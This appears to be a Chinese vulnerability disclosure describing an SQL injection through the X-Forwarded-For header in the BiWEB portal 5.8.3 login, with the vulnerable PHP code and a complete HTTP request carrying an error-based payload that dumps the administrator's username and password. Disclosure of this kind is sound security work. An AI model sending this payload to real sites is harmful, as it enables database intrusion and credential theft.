BiWEB最新门户版XFF注入一枚

### 简要描述： BiWEB最新门户版XFF注入一枚 ### 详细说明： 在wooyun上看到了有人把biweb的shell拿到了： [WooYun: BIWEB门户版Getwebshell漏洞](http://www.wooyun.org/bugs/wooyun-2014-049746) ，也有人提了其他漏洞，我也来找找它的漏洞吧。去官网下BiWEB门户版最新的5.8.3来看看。 看看用户登录处是怎么处理的。BiWEB首先对GET和POST进行了过滤，/config/filtrate.inc.php ``` <?php //过滤GET或POST的值，去除两端空格和转义符号 if ($_SERVER['REQUEST_METHOD'] == 'POST'){ check::filtrateData($_POST,$arrGPdoDB['htmlspecialchars']); }elseif($_SERVER['REQUEST_METHOD'] == 'GET'){ check::filtrateData($_GET,$arrGPdoDB['htmlspecialchars']); } ?> ``` 这里就先不说这种过滤的脑残之处了。 继续往下看，判断用户是否可以正常登录的文件/user/login.php。 ``` 无关代码 if(!empty($_POST)){ if (isset($_POST['authCode'])&&$_POST['authCode']!=$_SESSION['authCode']){ check::AlertExit("错误：验证码不匹配!",-1); } if ($objWebInit->userLogin($_POST,$arrGWeb['user_pass_type'],$arrGWeb['jamstr'])){ check::AlertExit("恭喜您，登陆成功!",$_SERVER['HTTP_REFERER']); }else{ check::AlertExit("用户名，或者密码错误!",$_SERVER['HTTP_REFERER']); } } 无关代码 ``` 去看看$objWebInit->userLogin()，在/user/class/user.class.php中 ``` public function userLogin($arrData,$isEncryption=0,$jamStr){ if(!check::CheckUser($arrData['User'])) { check::AlertExit("输入的用户名必须是4-20字符之间的数字、字母或中文!",-1); return false; } if(!check::CheckPassword($arrData['Pass'])) { check::AlertExit("输入的密码必须是4-20字符之间的数字、字母!",-1); return false; } $strPassTemp = $arrData['Pass']; if($isEncryption){ $strPassTemp=check::strEncryption($strPassTemp,$jamStr); } $strSQL = "SELECT * FROM $this->tablename2 WHERE user_name = ? and password = ?"; $rs = $this->db->prepare($strSQL); $rs->execute(array($arrData['User'],$strPassTemp)); if($arr = $rs->fetchAll()){ $arr = current($this->loadTableFieldG($arr)); $user_id = ''; $user_name = ''; $password=''; $real_name=''; $user_group = ''; $user_popedom = ''; $submit_date=''; $pass=''; $email=''; $tel=''; $company_cn=''; $user_type=''; $user_bonus=''; $_SESSION['user_id'] = $arr['user_id']; $_SESSION['user_name'] = $arr['user_name']; $_SESSION['password'] = $arr['password']; $_SESSION['user_group'] = $arr['user_group']; $_SESSION['user_grade'] = $arr['user_grade']; $_SESSION['user_popedom'] = $arr['user_popedom']; $_SESSION['real_name'] = $arr['real_name']; $_SESSION['email'] = $arr['email']; $_SESSION['tel'] = $arr['tel']; $_SESSION['company_cn'] = $arr['company_cn']; $_SESSION['user_type'] = $arr['user_type']; $_SESSION['user_bonus'] = $arr['user_bonus']; $_SESSION['pass'] = $arr['pass']; $_SESSION['province'] = $arr['province']; $_SESSION['city'] = $arr['city']; $_SESSION['type_id'] = $arr['type_id']; $arrUpdate['user_ip'] = check::getIP(); $arrUpdate['lastlog '] = date('Y-m-d H:i:s'); $arrUpdate['user_id'] = $arr['user_id']; $this->updateUser($arrUpdate); return true; }else{ return false; } } 可以看到这里有获取ip的语句$arrUpdate['user_ip'] = check::getIP();再去看看getIP的实现吧 static function getIP(){ $ip = ''; if (getenv("HTTP_CLIENT_IP")) $ip = getenv("HTTP_CLIENT_IP"); else if(getenv("HTTP_X_FORWARDED_FOR")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if(getenv("REMOTE_ADDR")) $ip = getenv("REMOTE_ADDR"); else $ip = "Unknow"; return $ip; } ``` 到这里就知道有问题了，登录，抓包，使用X-FROWARDED-FOR带入注入语句，成功注入。 Payload: ``` POST /user/login.php HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Referer: http://192.168.0.107/ Accept-Language: zh-CN User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: 192.168.0.107 Content-Length: 65 Proxy-Connection: Keep-Alive Pragma: no-cache x-forwarded-for:1' or (select 1 from (select count(*),concat(0x23,(select concat(user_name,0x23,password,0x23)from biweb_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or' Cookie: AJSTAT_ok_times=1; PHPSESSID=5s11q451a7ctalvsi4nfdelt97 User=XXXX&Pass=xxxxxxxx&authCode=1815&button=%E7%99%BB+%E5%BD%95 ``` 注入成功后SQL语句执行情况和爆出的管理员用户名和密码 [<img src="https://images.seebug.org/upload/201411/151723579004152672b5cce73d0ff4d7be73cf90.jpg" alt="爆出管理员信息副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/151723579004152672b5cce73d0ff4d7be73cf90.jpg) ### 漏洞证明： 见 详细说明